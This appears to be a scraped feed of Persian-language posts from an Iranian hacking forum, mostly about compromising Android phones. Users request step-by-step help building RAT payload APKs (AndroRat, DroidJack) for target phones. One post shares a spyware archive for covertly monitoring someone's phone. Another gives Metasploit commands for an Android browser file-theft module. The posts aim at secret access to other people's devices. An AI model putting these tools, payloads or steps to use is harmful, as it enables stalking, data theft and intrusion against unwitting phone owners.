    با سلام من قبلا با androrat کار کردم کار کرد و یکی از دوستامو باهاش هک کردم البته میدونست هکش میکنم خودم گفته بودم اما حالا هرچی میکنم دیگ نمیشه خیلی لازممه برنامه های دیگه هم تست کردم نشد زدم تو کار کالی و هرچی توی سایتا میگردم اموزش درست حسابی به ادم نمیدن حتی تو این انجمن هم ندیدم چیزی میخاستم یکی اموزشش رو برام بفرسته 0 تا صد که یه برنامه رو bind کنم یا ی فایل apk بسازم برای گوشی هدف اینقدی اموزشه جزییات داشته باشه که حتی بگه LPORT و LHOST رو از کجا گیر بیارم خیلی هم عجله دارم مرسی
  16. kia-sh

    پاک کردن ویروس

    یک موضوع پاسخی ارسال کرد برای kia-sh در سوال و جواب های بخش Trojan , Rat , Keylogger

    سلام. من حدودا یه هفته پیش از موبوگرامم پرت شدم بیرون...دیدم ک یکی اکانتمو هک کرده حتی بدون اینکه کدی به کسی بدم. از شانسم هنوز اکانتم توی کامپیوترم بود و تایید دومرحله ای زده بود ک نتونم وارد بشم.بالاخره دیلیت اکانت زدم و دوباره ساختم. تایید دو مرحله ای گذاشتم ک نتونه وارد شه. اما امروز ساعت 6 صبح دیدم دواره از موبوگرام افتادم بیرون...اما تونستم با تایید دومرحله ای وارد بشم. حدودا 2 ساعت پیش ک دوباره رسیدم خونه دیدم ک...بعله، دوباره هک شدم و طرف اومده کانالای... زده و همه رو جویین کرده. . به نظر شما گوشیم هک شده یا مشکل از برنامه اس؟؟ من ک خودم میگم با احتمال زیاد گوشیم هک شده. چطوری گوشیمو درست کنم؟؟ با ویروس کش eset ک هیچ ویروسیو نشون نمیداد اما با cm security یه دوتا ویروس نشون داد ک پاک کردم اما هنوز مطمعن نیستم ک درست شده باشه
  17. Victor_Sezar

    راه های هک موبایل

    یک موضوع پاسخی ارسال کرد برای Victor_Sezar در هک موبایل

    سلام و عرض ادبو احترام به اعضای انجمن. دوستان میشه همه ی راه های هک اندروید رو بزارید. *ممنون میشم*
  18. mohammad178

    نرم افزار های مفید

    یک موضوع پاسخی ارسال کرد برای mohammad178 در ابزارهای امنیتی

    با سلام خدمت دوستان من تصمیم گرفتم این تاپیک رو راه اندازی کنم،تا دوستان بتونن نرم افزار هایی رو که مد نظرشون هست و هر هکری باید اون ها رو داشته باشه قرار بدن. چند نکته رو هم بگم : 1. پسورد تمامی فایل ها باید آدرس سایت گارد ایران باشد.guardiran.org 2.لطفا دوستان نرم افزار های مربوط به امنیت و هک را قرار بدهند. 3.اگر نرم افزار نیاز به آموزش دارد انرا به صورت تصویری قرار دهند. 4.اسپم و کل کل ممنوع. موفق باشید.
  19. mohammad178
    سلام دوستان من یه گوشی هواوی دارم(g630 u10) که روت شده هست ولی الان حدود یک ماهی هست که وای فایش روشن نمیشه ولی بلوتوثش کار میکنه اگه کسی از دوستان میدونه چطور میشه حلش کرد لطفا بگن ممنون
  20. mehdi_far

    رت اندروید

    یک موضوع پاسخی ارسال کرد برای mehdi_far در سوال و جواب های بخش Trojan , Rat , Keylogger

    سلام من نرم افزار Droidjack روی vps نصب کردم اما در قسمت dynamic dns نمی دونم چی باید بزنم وقتی ip valid وی پی اس میدم ارتباط برقرار نمی شه آیا بازهم نیاز به استفاده از no-ip و portforwarding هست؟ دوستان لطفا راهنمایی کنند ضمنا اگه رات بهتری واسه اجرا روی vps دارید لطفا معرفی کنید
  21. Mr.08
    با سلام و خسته نباشید از مدیر میخوام که اگه پست تکراریه این دفعه رو گذشت کنه!!! میخوام بدونم روشی برای بدست گرفتن کامل یه گوشی اندروید دیگه که میخوام روش کاری هایی رو انجام بدیم وجود داره؟ مثلا پاک کردن داده ها و بازگشت گوشی به تنضیمات کارخانه اگه وجود داره لینک دانلود و آموزش رو برام بفرستید ممنون از همه
  22. GHOST

    Terminal Emulator

    یک موضوع پاسخی ارسال کرد برای GHOST در نرم افزار موبایل

    ترمینال چیست: محیطی است که بوسیله آن میتوان تمام قسمتهای لینوکس را با کد نویسی (دستور نویسی) هدایت کرد. محیط آن تقریبآ شبیه محیط Dos در ویندوز است ولی بسیار پیشرفته تر خط دستورات و آموزش های اَولیه برای ورود روی اینجا کلیک کنید. لینک دانلود از کافه بازار https://cafebazaar.ir/app/jackpal.androidterm/?l=fa
  23. icebool

    هک آندروید 4+

    یک موضوع پاسخی ارسال کرد برای icebool در سوال و جواب های سیستم عامل ها

    با سلام و خسته نباشید روشی برای هک کردن آنروید ها 4 به بالا هست تمامی این آموزش هایی که در این انجمن دیدم برای آندروید های 2 بوده و جواب میداده
  24. mohammad178

    جاسوسی در اندروید با setting

    یک موضوع پاسخی ارسال کرد برای mohammad178 در تروجان و کیلاگر

    با سلام یه نرم افزار برای جاسوسی در گوشی های اندروید . لینک اسکن نرم افزار : https://virusscan.jotti.org/en-US/filescanjob/8vssyvjhps و https://virusscan.jotti.org/en-US/filescanjob/xfuqnopxcd و https://www.metadefender.com/#!/results/file/ddb044263d634555be1c7f4812fd9483/extracted با این نرم افزار می تونید در گوشی طرف جاسوسی کنید کار کردن باهاش خیلی اسونه فقط احتیاج به دو تا ایمیل دارید یکی برای ارسال و یکی برای دریافت . این نرم افزار فارسیه پسورد:guardiran.org امنیت ایمیل اول رو از داخل جیمیل کم کنید تا جواب بده Setting.rar
  25. mhmdn
    سلام اینم ی روش دیگه هک اندروید با auxiliary ها تو انجمن گشتم نبود اگرهم باشه ببخشید دگ خب آموزش: ترمینالو باز میکنیم با استفاده از msfconsole وارد متاسپلویت میشیم این کد رو وارد میکنیم: use auxiliary/gather/android_htmlfileprovider بعد ب ترتیب این کد ها رو: set SRVHOST ur ip set URIPATH / set SRVPORT 80 بعد با کد exploit اجراش میکنیم طرز کار هم به این صورته که متااسپلویت از طریق port که شما معرفی میکنید بر روی سرور اجرا میشه مثلا : 192.168.1.10:80 زمانی که دستگاه اندرویدی این صفحه رو باز کنه، در محیط متااسپلویت ، session ، مورد نظر فعال میشه تا جای ک من میدونم رو اندروید 2.2 ب پایین ج میده

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...